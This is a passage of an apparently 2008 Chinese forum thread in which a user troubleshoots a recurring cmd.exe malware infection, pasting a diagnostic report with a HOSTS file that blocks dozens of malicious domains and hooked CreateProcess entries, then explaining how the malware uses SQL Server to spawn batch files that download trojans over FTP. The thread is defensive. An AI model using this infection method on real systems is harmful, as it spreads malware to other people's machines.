    [C:\Program Files\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [D:\工具\系统工具\系统诊断工具sreng2\Upload\3rdUpd.DLL]  [Smallfrogs Studio, 2, 1, 0, 15]
gototop
 
1234567i
头像
初生襁褓狮
  • 帖子:26
  • 注册: 2005-06-20
  • 来自:
发表于: 2008-09-02 22:10 | 显示全部 短消息 资料
字号: 13楼

回复:cmd进程病毒

==================================
文件关联
.TXT  Error. [C:\WINDOWS\notepad.exe %1]
.EXE  OK. ["%1" %*]
.COM  OK. ["%1" %*]
.PIF  OK. ["%1" %*]
.REG  OK. [regedit.exe "%1"]
.BAT  OK. ["%1" %*]
.SCR  OK. ["%1" /S]
.CHM  Error. ["hh.exe" %1]
.HLP  OK. [%SystemRoot%\System32\winhlp32.exe %1]
.INI  Error. [C:\WINDOWS\System32\NOTEPAD.EXE %1]
.INF  OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.VBS  Error. [超级解霸3000]
.JS  OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.LNK  OK. [{00021401-0000-0000-C000-000000000046}]

==================================
Winsock 提供者
N/A

==================================
Autorun.inf
N/A

==================================
HOSTS 文件
127.0.0.1      localhost
127.0.0.1  yu.8s7.net
127.0.0.1  1.jopanqc.com
127.0.0.1  2.joppnqq.com
127.0.0.1  wg.47255.com
127.0.0.1  1.joppnqq.com
127.0.0.1  xxx.m111.biz
127.0.0.1  1.jopenqc.com
127.0.0.1  1.jopenkk.com
127.0.0.1  xxx.vh7.biz
127.0.0.1  xxx.j41m.com
127.0.0.1  3.joppnqq.com
127.0.0.1  d.93se.com
127.0.0.1  www.868wg.com
127.0.0.1  xxx.mmma.biz
127.0.0.1  ilove.com
127.0.0.1  tp.shpzhan.cn
127.0.0.1  www.tomwg.com
127.0.0.1  www.cike007.cn
127.0.0.1  www.22aaa.com
127.0.0.1  xx.exiao01.com
127.0.0.1  www.exiao01.com
127.0.0.1  www.exiao01.com
127.0.0.1  new.749571.com
127.0.0.1  xtx.kv8.info
127.0.0.1  cao.kv8.info
127.0.0.1  1.jopmmqq.com
127.0.0.1  171817.171817.com
127.0.0.1  d2.llsging.com
127.0.0.1  down.malasc.cn
127.0.0.1  llboss.com
127.0.0.1  nx.51ylb.cn
127.0.0.1  my.531jx.cn
127.0.0.1  qqq.dzydhx.com
127.0.0.1  qqq.hao1658.com
127.0.0.1  www.333292.com
127.0.0.1  down.18dd.net
127.0.0.1  up.22x44.com
127.0.0.1  aaa.faba01.com
127.0.0.1  bad.tqdlt.cn
127.0.0.1  1.chsipo.com
127.0.0.1  c3.aishangai.net
127.0.0.1  c2.aishangai.net
127.0.0.1  xxx.188dm.com
127.0.0.1  x2.1a2b3c1.com
127.0.0.1  d1.163500.net
127.0.0.1  down.google-serv.cn
127.0.0.1  idc.windowsupdeta.cn
127.0.0.1  nc.mskess.com
127.0.0.1  ok.sl8cjs.cn
127.0.0.1  dl.pvs360.com
127.0.0.1  ta.pvs360.com
127.0.0.1  cw.pvs360.com
127.0.0.1  fg.pvs360.com

==================================
进程特权扫描
特殊特权被允许: SeLoadDriverPrivilege [PID = 1748, C:\PROGRA~1\MICROS~2\MSSQL\BINN\SQLSERVR.EXE]
特殊特权被允许: SeDebugPrivilege [PID = 196, C:\PROGRAM FILES\ASUS SECURITY CENTER\ASUS SECURITY PROTECT MANAGER\BIN\ASGHOST.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 196, C:\PROGRAM FILES\ASUS SECURITY CENTER\ASUS SECURITY PROTECT MANAGER\BIN\ASGHOST.EXE]
特殊特权被允许: SeDebugPrivilege [PID = 3840, C:\PROGRAM FILES\WIRELESS CONSOLE 2\WCOURIER.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 3840, C:\PROGRAM FILES\WIRELESS CONSOLE 2\WCOURIER.EXE]
特殊特权被允许: SeDebugPrivilege [PID = 164, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTMNG.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 164, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTMNG.EXE]
特殊特权被允许: SeDebugPrivilege [PID = 2884, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSA2DP.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 2884, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSA2DP.EXE]
特殊特权被允许: SeDebugPrivilege [PID = 2916, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTHID.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 2916, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTHID.EXE]
特殊特权被允许: SeDebugPrivilege [PID = 3160, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTHSP.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 3160, C:\PROGRAM FILES\TOSHIBA\BLUETOOTH TOSHIBA STACK\TOSBTHSP.EXE]
特殊特权被允许: SeDebugPrivilege [PID = 2268, C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\PROCEXP.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 2268, C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\PROCEXP.EXE]
特殊特权被允许: SeDebugPrivilege [PID = 2816, D:\PROGRAM FILES\应用\同花顺核新2008\ZDSJ.EXE]
特殊特权被允许: SeLoadDriverPrivilege [PID = 2816, D:\PROGRAM FILES\应用\同花顺核新2008\ZDSJ.EXE]

==================================
API HOOK
入口点错误:CreateProcessA (危险等级: 高,  被下面模块所HOOK: 0x00FF3DA5)
入口点错误:CreateProcessW (危险等级: 高,  被下面模块所HOOK: 0x00FF3E8D)

==================================
隐藏进程
N/A

==================================


[/CODE]
gototop
 
1234567i
头像
初生襁褓狮
  • 帖子:26
  • 注册: 2005-06-20
  • 来自:
发表于: 2008-09-03 09:19 | 显示全部 短消息 资料
字号: 14楼

回复:cmd进程病毒

楼上的上策,不过在组策略中cmd的路径是。。。。
gototop
 
1234567i
头像
初生襁褓狮
  • 帖子:26
  • 注册: 2005-06-20
  • 来自:
发表于: 2008-09-03 23:12 | 显示全部 短消息 资料
字号: 15楼

回复:cmd进程病毒

将cmd.exe安全设置为只有administrator用户可以访问,暂时解决问题。cmd进程不再跳出来。
gototop
 
1234567i
头像
初生襁褓狮
  • 帖子:26
  • 注册: 2005-06-20
  • 来自:
发表于: 2008-09-04 18:01 | 显示全部 短消息 资料
字号: 16楼

回复:cmd进程病毒

这个病毒的原理应该是这样:
1 通过sqlserver数据库进程启动批处理程序
2 在批处理中生成*.sys和*.bat文件,并在其中写入通过ftp下载病毒文件的代码。
3 运行生成的批处理文件通过ftp下载病毒
4下载完成后运行该病毒,并删除下载批处理程序。消灭病毒来源的痕迹。
也就是说上面说道的*.sys 和 *.bat都不是病毒,是用来下载病毒用的。
真正的病毒是 boots1.exe和bootss.exe等等这些东东。
从我的机器搜索来看,这些病毒并没有成功的下载到我的计算机上。大约是因为我禁用了ftp的关系。
这个病毒的可恶之处就在于,不杀灭sqlserver程序中的病毒代码。那么他就会不断的从不同的ftp上下载各种版本的病毒木马。让你的计算机处于危险的边缘。
gototop
 
1234567i
头像
初生襁褓狮
  • 帖子:26
  • 注册: 2005-06-20
  • 来自:
发表于: 2008-09-04 18:02 | 显示全部 短消息 资料
字号: 17楼

回复:cmd进程病毒

而且你永远不会知道,这些病毒是怎么来的。杀了一个又来一个。
gototop
 
<<上一主题|下一主题>>
12   2  /  2  页   跳转
页面顶部
Powered by Discuz!NT